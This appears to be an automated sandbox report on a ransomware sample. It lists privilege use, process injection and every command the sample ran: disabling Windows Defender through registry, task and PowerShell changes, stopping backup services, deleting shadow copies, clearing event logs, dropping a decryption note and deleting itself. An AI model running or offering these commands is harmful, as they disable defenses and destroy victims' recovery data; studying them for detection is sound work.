Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3376 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3376 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3376 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 2832 wrote to memory of 4152 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2832 wrote to memory of 4152 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2832 wrote to memory of 4152 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3376 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3376 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3376 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 4036 wrote to memory of 3080 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4036 wrote to memory of 3080 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4036 wrote to memory of 3080 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3376 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3376 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3376 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3980 wrote to memory of 4196 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3980 wrote to memory of 4196 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3980 wrote to memory of 4196 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3376 wrote to memory of 4188 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3376 wrote to memory of 4188 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3376 wrote to memory of 4188 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 4188 wrote to memory of 4396 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4188 wrote to memory of 4396 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4188 wrote to memory of 4396 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3376 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3376 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3376 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 4384 wrote to memory of 4436 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4384 wrote to memory of 4436 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4384 wrote to memory of 4436 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3376 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3376 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3376 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 4336 wrote to memory of 3228 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4336 wrote to memory of 3228 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4336 wrote to memory of 3228 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3376 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3376 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3376 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3784 wrote to memory of 4508 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3784 wrote to memory of 4508 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3784 wrote to memory of 4508 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3376 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3376 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3376 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 4512 wrote to memory of 452 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4512 wrote to memory of 452 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4512 wrote to memory of 452 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3376 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3376 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 3376 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\net.exe
PID 612 wrote to memory of 840 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 612 wrote to memory of 840 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 612 wrote to memory of 840 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3376 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\sc.exe
PID 3376 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\sc.exe
PID 3376 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\sc.exe
PID 3376 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\sc.exe
PID 3376 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\sc.exe
PID 3376 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\sc.exe
PID 3376 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\sc.exe
PID 3376 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\sc.exe
PID 3376 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\sc.exe
PID 3376 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe C:\Windows\SysWOW64\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe

"C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe"

C:\Windows\SysWOW64\net.exe

net.exe stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "vmicvss" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "VSS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "WebClient" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UnistoreSvc_1643c" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_1643c" /y

C:\Windows\SysWOW64\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UnistoreSvc_1643c" start= disabled

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl application

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\notepad.exe

notepad.exe C:\iotb_HOW_TO_DECRYPT.txt

C:\Windows\SysWOW64\cmd.exe

cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe"

C:\Windows\SysWOW64\PING.EXE

ping.exe -n 5 127.0.0.1

Network

Country Destination Domain Proto
US 8.8.8.8:53 time.windows.com udp
NL 20.101.57.9:123 time.windows.com udp

Files

memory/2832-115-0x0000000000000000-mapping.dmp

memory/4152-116-0x0000000000000000-mapping.dmp

memory/4036-117-0x0000000000000000-mapping.dmp

memory/3080-118-0x0000000000000000-mapping.dmp

memory/3980-119-0x0000000000000000-mapping.dmp

memory/4196-120-0x0000000000000000-mapping.dmp

memory/4188-121-0x0000000000000000-mapping.dmp

memory/4396-122-0x0000000000000000-mapping.dmp

memory/4384-123-0x0000000000000000-mapping.dmp

memory/4436-124-0x0000000000000000-mapping.dmp

memory/4336-125-0x0000000000000000-mapping.dmp

memory/3228-126-0x0000000000000000-mapping.dmp

memory/3784-127-0x0000000000000000-mapping.dmp

memory/4508-128-0x0000000000000000-mapping.dmp

memory/4512-129-0x0000000000000000-mapping.dmp

memory/452-130-0x0000000000000000-mapping.dmp

memory/612-131-0x0000000000000000-mapping.dmp

memory/840-132-0x0000000000000000-mapping.dmp

memory/432-133-0x0000000000000000-mapping.dmp

memory/1116-134-0x0000000000000000-mapping.dmp

memory/1280-135-0x0000000000000000-mapping.dmp

memory/1508-136-0x0000000000000000-mapping.dmp

memory/1712-137-0x0000000000000000-mapping.dmp

memory/1920-138-0x0000000000000000-mapping.dmp

memory/2232-139-0x0000000000000000-mapping.dmp

memory/2404-140-0x0000000000000000-mapping.dmp

memory/2648-141-0x0000000000000000-mapping.dmp

memory/3008-142-0x0000000000000000-mapping.dmp

memory/3812-143-0x0000000000000000-mapping.dmp

memory/4520-144-0x0000000000000000-mapping.dmp

memory/4784-145-0x0000000000000000-mapping.dmp

memory/4888-146-0x0000000000000000-mapping.dmp

memory/4664-147-0x0000000000000000-mapping.dmp

memory/2896-148-0x0000000000000000-mapping.dmp

memory/4916-149-0x0000000000000000-mapping.dmp

memory/4564-150-0x0000000000000000-mapping.dmp

memory/4600-151-0x0000000000000000-mapping.dmp

memory/4884-152-0x0000000000000000-mapping.dmp

memory/5024-153-0x0000000000000000-mapping.dmp

memory/1100-154-0x0000000000000000-mapping.dmp

memory/2196-155-0x0000000000000000-mapping.dmp

memory/736-156-0x0000000000000000-mapping.dmp

memory/4956-157-0x0000000000000000-mapping.dmp

memory/4828-158-0x0000000000000000-mapping.dmp

memory/712-159-0x0000000000000000-mapping.dmp

memory/1108-160-0x0000000000000000-mapping.dmp

memory/1240-161-0x0000000000000000-mapping.dmp

memory/2952-162-0x0000000000000000-mapping.dmp

memory/1824-163-0x0000000000000000-mapping.dmp

memory/1940-164-0x0000000000000000-mapping.dmp

memory/2244-165-0x0000000000000000-mapping.dmp

memory/2736-166-0x0000000000000000-mapping.dmp

memory/3324-167-0x0000000000000000-mapping.dmp

memory/4672-168-0x0000000000000000-mapping.dmp

memory/332-169-0x0000000000000000-mapping.dmp

memory/2668-170-0x0000000000000000-mapping.dmp

memory/3732-171-0x0000000000000000-mapping.dmp

memory/3264-172-0x0000000000000000-mapping.dmp

memory/4116-173-0x0000000000000000-mapping.dmp

memory/3444-174-0x0000000000000000-mapping.dmp

memory/3652-175-0x0000000000000000-mapping.dmp

memory/4064-176-0x0000000000000000-mapping.dmp

memory/3192-177-0x0000000000000000-mapping.dmp

memory/4176-178-0x0000000000000000-mapping.dmp

memory/3320-179-0x00000000010E0000-0x00000000010E1000-memory.dmp

memory/3320-180-0x00000000010E0000-0x00000000010E1000-memory.dmp

memory/3320-181-0x0000000004A10000-0x0000000004A46000-memory.dmp

memory/3320-182-0x00000000075B0000-0x0000000007BD8000-memory.dmp

memory/3320-183-0x0000000007380000-0x00000000073A2000-memory.dmp

memory/3320-184-0x0000000007520000-0x0000000007586000-memory.dmp

memory/3320-185-0x0000000007C50000-0x0000000007CB6000-memory.dmp

memory/3320-186-0x00000000049C0000-0x00000000049C1000-memory.dmp

memory/3320-187-0x00000000049C2000-0x00000000049C3000-memory.dmp

